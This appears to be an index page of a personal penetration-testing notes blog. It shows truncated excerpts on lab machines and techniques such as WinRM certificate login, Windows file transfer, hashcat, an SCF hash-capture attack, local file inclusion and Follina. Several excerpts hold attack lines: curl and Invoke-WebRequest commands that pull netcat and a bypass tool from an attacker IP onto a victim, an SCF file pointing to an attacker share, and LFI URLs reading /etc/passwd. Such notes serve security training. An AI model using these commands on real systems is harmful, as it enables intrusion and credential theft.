Shuciran Pentesting Notes

Worker (Medium)

Host entries 10.10.10.203 N/A If Active Directory => Synchronize your NTP with the domain controller: ntpdate 10.10.10.103 Content SVN - Subversion Enumeration Information Leakage VHos...

WinRM Certificate (password-less) based authentication

WINRM Certificate We can authenticate via WinRM by creating a certificate; this is an AD CS feature. As we can check in these notes, all we need to do is follow these steps: Pre-requisites: Access...

Windows File Transfer

Upload the Netcat executable for Windows. From the victim machine: curl http://10.10.16.4/nc.exe -o nc.exe Examples: [[StreamIO#^40a776]] Network File System through SMB First create with impacket the se...

Powershell Download

iwr (Invoke-WebRequest) Transfer a file with the following command: PS> iwr -uri http://10.10.14.4/PsBypassCLM.exe -OutFile PsBypassCLM.exe Execute these commands to create wget.ps1 on the victim m...

Hashcat

Identify the hash type If you want to know the type of a password hash you can run the following command on your machine: hashcat.exe -j -m hash.txt And it will throw the type: Hash-mode was not...

SMB Share with writing permissions (SCF Attack)

SCF Attack First we need to write a file inside the share with writing permissions: (root㉿kali)-[/mnt/tempMount/Users/Public] └─# cat test.scf [Shell] Command=2 IconFile=\\10.10.14.4\...

Local File Inclusion

Simple LFI If input is accepted on a URL parameter we can try to access any system file and check whether or not it retrieves the file: http://10.11.1.35/section.php?page=/etc/passwd http://1...

Websocket Exploitation

Redirect traffic to a TCP localhost port We can redirect the websocket traffic to a TCP localhost port so we can interact with it as if it were an HTTP port: from http.server import SimpleHTTPRequest...

SWAKS (Swiss Army Knife for SMTP)

Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP test tool. Features include: SMTP extensions including TLS, authentication, pipelining, PROXY, PRDR, and XCLIENT Protoco...

Follina Exploitation

The following Follina exploit works pretty well; all you need to do is clone the repository and execute it as follows. The "-c" option is the command to execute, which can be a cmd or a PowerShell instruction...